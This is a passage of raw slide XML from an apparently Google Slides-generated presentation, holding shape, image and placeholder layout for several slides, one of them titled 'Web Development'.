          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32258" y="49302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94" name="Google Shape;694;p62"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32525" y="65064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95" name="Google Shape;695;p62"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32658" y="80827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96" name="Google Shape;696;p62"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32325" y="96589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97" name="Google Shape;697;p62"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32325" y="112963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698" name="Google Shape;698;p6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699" name="Google Shape;699;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="237"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="4930259"/>
            <a:ext cx="1540411" cy="1190090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="700" name="Google Shape;700;p6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1" name="Google Shape;701;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="237"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="8109292"/>
            <a:ext cx="1540411" cy="1190090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="702" name="Google Shape;702;p6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03" name="Google Shape;703;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="237"/>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04"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="705" name="Google Shape;705;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042607" y="33008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63"/>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07" name="Google Shape;707;p63"/>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708" name="Google Shape;708;p63"/>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709" name="Google Shape;709;p6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10" name="Google Shape;710;p63"/>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711" name="Google Shape;711;p6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12" name="Google Shape;712;p63"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32392" y="33990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13" name="Google Shape;713;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="4877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63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="64532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63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="80294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63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042607" y="9605733"/>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63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="11182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63"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32258" y="49302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19" name="Google Shape;719;p63"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32525" y="65064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20" name="Google Shape;720;p63"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32658" y="80827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21" name="Google Shape;721;p63"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32325" y="96589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22" name="Google Shape;722;p63"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32325" y="112963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723" name="Google Shape;723;p63"/>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24" name="Google Shape;724;p63"/>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25" name="Google Shape;725;p63"/>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26" name="Google Shape;726;p63"/>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27" name="Google Shape;727;p63"/>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28" name="Google Shape;728;p63"/>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29"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="730" name="Google Shape;730;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042607" y="33008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64"/>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32" name="Google Shape;732;p64"/>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733" name="Google Shape;733;p64"/>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734" name="Google Shape;734;p6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35" name="Google Shape;735;p64"/>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736" name="Google Shape;736;p6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37" name="Google Shape;737;p64"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32392" y="33990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38" name="Google Shape;738;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="4877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64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="64532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64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="80294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64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042607" y="9605733"/>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64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="11182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64"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32258" y="49302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44" name="Google Shape;744;p64"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32525" y="65064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45" name="Google Shape;745;p64"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32658" y="80827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46" name="Google Shape;746;p64"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32325" y="96589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47" name="Google Shape;747;p64"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32325" y="112963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748" name="Google Shape;748;p64"/>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49" name="Google Shape;749;p64"/>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0" name="Google Shape;750;p64"/>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1" name="Google Shape;751;p64"/>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2" name="Google Shape;752;p64"/>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53" name="Google Shape;753;p64"/>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46"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47" name="Google Shape;47;p2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48" name="Google Shape;48;p29"/>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
        <p:nvSpPr>
          <p:cNvPr id="50" name="Google Shape;50;p2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Web Development</a:t>
            </a:r>
            <a:endParaRPr sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="51" name="Google Shape;51;p29"/>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52" name="Google Shape;52;p2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3" name="Google Shape;53;p2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4" name="Google Shape;54;p2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55" name="Google Shape;55;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2069089" y="3283233"/>
            <a:ext cx="6094420" cy="454033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54"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="755" name="Google Shape;755;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042607" y="33008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65"/>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57" name="Google Shape;757;p65"/>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758" name="Google Shape;758;p65"/>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759" name="Google Shape;759;p6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60" name="Google Shape;760;p65"/>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761" name="Google Shape;761;p6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62" name="Google Shape;762;p65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32392" y="33990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63" name="Google Shape;763;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="4877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65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="64532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65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="80294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65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042607" y="9605733"/>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65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="11182067"/>
            <a:ext cx="20603401"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65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32258" y="49302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69" name="Google Shape;769;p65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32525" y="6506467"/>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70" name="Google Shape;770;p65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32658" y="80827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71" name="Google Shape;771;p65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32325" y="96589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72" name="Google Shape;772;p65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32325" y="11296333"/>
            <a:ext cx="24443101"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773" name="Google Shape;773;p65"/>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74" name="Google Shape;774;p65"/>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75" name="Google Shape;775;p65"/>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76" name="Google Shape;776;p65"/>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77" name="Google Shape;777;p65"/>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78" name="Google Shape;778;p65"/>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79"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="780" name="Google Shape;780;p6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66"/>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82" name="Google Shape;782;p66"/>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783" name="Google Shape;783;p66"/>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784" name="Google Shape;784;p6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85" name="Google Shape;785;p66"/>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786" name="Google Shape;786;p6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87" name="Google Shape;787;p66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="31342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88" name="Google Shape;788;p6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66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666" y="4527867"/>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0" name="Google Shape;790;p6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66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5922933"/>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2" name="Google Shape;792;p6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66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-666" y="73166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4" name="Google Shape;794;p6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66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="87102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6" name="Google Shape;796;p6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66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-133" y="10103933"/>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8" name="Google Shape;798;p6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66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67" y="115656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800" name="Google Shape;800;p6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1" name="Google Shape;801;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1036"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="4559067"/>
            <a:ext cx="1389526" cy="1056315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="802" name="Google Shape;802;p6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03" name="Google Shape;803;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1036"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="7347100"/>
            <a:ext cx="1389526" cy="1056315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="804" name="Google Shape;804;p6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05" name="Google Shape;805;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1380" b="1389"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="10119360"/>
            <a:ext cx="1388917" cy="1048513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="806" name="Google Shape;806;p6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07"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="808" name="Google Shape;808;p6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67"/>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10" name="Google Shape;810;p67"/>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811" name="Google Shape;811;p67"/>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812" name="Google Shape;812;p6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813" name="Google Shape;813;p67"/>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814" name="Google Shape;814;p6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15" name="Google Shape;815;p67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="31342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16" name="Google Shape;816;p6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67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666" y="4527867"/>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18" name="Google Shape;818;p6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67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5922933"/>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20" name="Google Shape;820;p6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67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-666" y="73166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22" name="Google Shape;822;p6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67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="87102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24" name="Google Shape;824;p6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67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-133" y="10103933"/>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26" name="Google Shape;826;p6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67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67" y="115656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828" name="Google Shape;828;p67"/>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29" name="Google Shape;829;p67"/>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0" name="Google Shape;830;p67"/>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1" name="Google Shape;831;p67"/>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2" name="Google Shape;832;p67"/>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33" name="Google Shape;833;p67"/>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34" name="Google Shape;834;p67"/>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35"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="836" name="Google Shape;836;p6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68"/>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38" name="Google Shape;838;p68"/>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839" name="Google Shape;839;p68"/>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840" name="Google Shape;840;p6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841" name="Google Shape;841;p68"/>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842" name="Google Shape;842;p6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43" name="Google Shape;843;p68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="31342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44" name="Google Shape;844;p6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68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666" y="4527867"/>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46" name="Google Shape;846;p6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68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5922933"/>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48" name="Google Shape;848;p6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68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-666" y="73166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50" name="Google Shape;850;p6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68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="87102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52" name="Google Shape;852;p6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68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-133" y="10103933"/>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54" name="Google Shape;854;p6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68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67" y="115656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856" name="Google Shape;856;p68"/>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57" name="Google Shape;857;p68"/>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58" name="Google Shape;858;p68"/>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59" name="Google Shape;859;p68"/>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0" name="Google Shape;860;p68"/>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1" name="Google Shape;861;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2883" b="2891"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="10119360"/>
            <a:ext cx="1388917" cy="1048512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="862" name="Google Shape;862;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2883" b="2891"/>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63"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="864" name="Google Shape;864;p69"/>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69"/>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66" name="Google Shape;866;p69"/>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867" name="Google Shape;867;p69"/>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868" name="Google Shape;868;p6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869" name="Google Shape;869;p69"/>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870" name="Google Shape;870;p6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1" name="Google Shape;871;p69"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="31342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2" name="Google Shape;872;p69"/>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69"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666" y="4527867"/>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4" name="Google Shape;874;p69"/>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69"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5922933"/>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6" name="Google Shape;876;p69"/>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69"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-666" y="7316600"/>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8" name="Google Shape;878;p69"/>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69"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="87102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80" name="Google Shape;880;p69"/>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69"/>
